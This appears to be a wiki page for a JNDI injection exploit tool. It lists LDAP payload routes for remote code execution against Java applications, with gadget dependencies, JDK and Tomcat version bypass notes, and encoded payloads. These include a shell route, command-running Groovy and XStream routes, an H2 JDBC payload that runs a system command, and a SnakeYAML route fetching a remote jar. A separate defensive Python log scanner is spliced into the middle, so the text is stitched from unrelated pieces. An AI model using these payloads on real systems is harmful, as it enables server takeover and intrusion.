1. JNDI Routing
炁 edited this page Nov 12, 2024 · 38 revisions
The Gadget and Payload parts of a JNDI injection payload are case-insensitive.

"JNDI injection payload" refers to this part of the string -------+
                                                                   |
jndi:ldap://127.0.0.1:1389/TomcatBypass <--------------------------+ /M-EX-MS-TSMSFromJMXS/shell/LXB3IDEyMzQ1Ng==
Oracle JDK 11.0.1, 8u191, 7u201, 6u211 and later versions set the default of the system property com.sun.jndi.ldap.object.trustURLCodebase to false in order to restrict JNDI exploitation over the LDAP protocol; by default, LDAP is therefore no longer allowed to load an ObjectFactory class from a remote codebase.
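From the defender's side, the most useful thing to recognise in the payload shape above is the jndi:<scheme>://host:port/<route> prefix: any lookup that points at a remote LDAP or RMI naming server from untrusted input is worth an alert regardless of which route or gadget follows. The following is an added example, not code from this wiki or its project, that scans constructed log lines for such lookups, matches scheme and route name case-insensitively (as the page notes for gadget and payload names), ignores local java: lookups, and reports every hit whose host is not on an assumed allow-list (ldap.corp.example is a made-up internal host).

```python
import re
from urllib.parse import urlsplit

# Constructed sample log lines; none of these come from the page or a real system.
SAMPLE_LOGS = [
    '10.0.0.5 - - [12/Nov/2024:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [12/Nov/2024:10:01:07 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://127.0.0.1:1389/TomcatBypass/M-EX-MS-TSMSFromJMXS/shell/LXB3IDEyMzQ1Ng==}"',
    'app: user lookup name="${JNDI:RMI://127.0.0.1:1099/obj}"',
    'app: config value "jndi:java:comp/env/jdbc/appDS"',
]

# Only schemes that make the JVM contact a naming server are of interest; a local
# java: lookup is normal application behaviour. The match is case-insensitive.
JNDI_RE = re.compile(r'jndi:(?P<scheme>ldaps?|rmi|dns)://(?P<rest>[^\s"}\']+)', re.IGNORECASE)

# Assumed allow-list of internal naming servers for this environment (hypothetical).
ALLOWED_HOSTS = {"ldap.corp.example"}


def find_jndi_lookups(line):
    """Return (scheme, host, port, route) for every remote JNDI lookup found in one line.

    route is the first path segment, lower-cased, because the wiki states that the
    gadget and payload names in the path are case-insensitive.
    """
    hits = []
    for m in JNDI_RE.finditer(line):
        parts = urlsplit(f"{m.group('scheme').lower()}://{m.group('rest')}")
        route = parts.path.strip("/").split("/")[0].lower()
        hits.append((parts.scheme, parts.hostname, parts.port, route))
    return hits


def triage(lines):
    """Flag every remote JNDI lookup whose target host is not on the allow-list."""
    alerts = []
    for n, line in enumerate(lines, 1):
        for scheme, host, port, route in find_jndi_lookups(line):
            if host not in ALLOWED_HOSTS:
                alerts.append({"line": n, "scheme": scheme, "host": host, "port": port, "route": route})
    return alerts


if __name__ == "__main__":
    for alert in triage(SAMPLE_LOGS):
        print(alert)
```

The regex stops at whitespace, quotes and a closing brace so that a lookup wrapped in ${...} is captured without the brace, and the host and port are taken from urlsplit rather than from a second regex so that bracketed IPv6 literals and explicit ports are handled consistently. In a real pipeline the route name is useful as an enrichment field for the alert, since it tells the responder which loading technique the LDAP server was asked for.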
org.apache.naming.factory.BeanFactory
Dependencies:
- javax.el.ELProcessor
Since 9.0.63 the forceString option has been removed as a security hardening measure.
Usable with tomcat-embed-core or tomcat-catalina <= 9.0.62 (Spring Boot Starter Tomcat <= 2.6.7).
Writes the gadget's serialized data into the javaSerializedData attribute.
Dependencies:
- groovy.lang.GroovyShell
ldap://127.0.0.1:1389/groovy/command/calc
Class loading is constructed through com.ibm.ws.client.applicationclient.ClientJ2CCFFactory.
JDK version < 20
Optional factoryType values:
org.apache.tomcat.dbcp.dbcp2.BasicDataSourceFactory
org.apache.tomcat.dbcp.dbcp.BasicDataSourceFactory
org.apache.commons.dbcp2.BasicDataSourceFactory
org.apache.commons.dbcp.BasicDataSourceFactory
com.alibaba.druid.pool.DruidDataSourceFactory
org.apache.tomcat.jdbc.pool.DataSourceFactory
Construct an arbitrary JDBC payload yourself:
ldap://127.0.0.1:1389/jdbc1/org.h2.Driver/org.apache.tomcat.jdbc.pool.DataSourceFactory/base64/amRiYzpoMjptZW06dGVzdDtNT0RFPU1TU1FMU2VydmVyO2luaXQ9Q1JFQVRFIFRSSUdHRVIgdGVzdCBCRUZPUkUgU0VMRUNUIE9OIElORk9STUFUSU9OX1NDSEVNQS5UQUJMRVMgQVMgJy8vamF2YXNjcmlwdApqYXZhLmxhbmcuUnVudGltZS5nZXRSdW50aW1lKCkuZXhlYygiY2FsYyIpJw==
Uses com.sun.jndi.ldap.Obj#decodeRmiObject by setting javaRemoteLocation.
*//85207 restores the Factory object, converting the LDAP lookup into RMI to bypass the restriction.
ldap://127.0.0.1:1389/ldap2rmi/rmi参数 (the last path segment, rmi参数, is a placeholder for the RMI parameter)
Dependencies:
- org.yaml.snakeyaml.Yaml
ldap://127.0.0.1:1389/snakeyaml/url/base64/aHR0cDovLzEyNy4wLjAuMS8xLmphcg==
Dependencies:
- com.thoughtworks.xstream.XStream
ldap://127.0.0.1:1389/xstream/command/calc
org.apache.catalina.users.MemoryUserDatabaseFactory in Tomcat
ldap://127.0.0.1:1389/memoryxxe/url/base64/aHR0cDovLzEyNy4wLjAuMS9leHAueG1s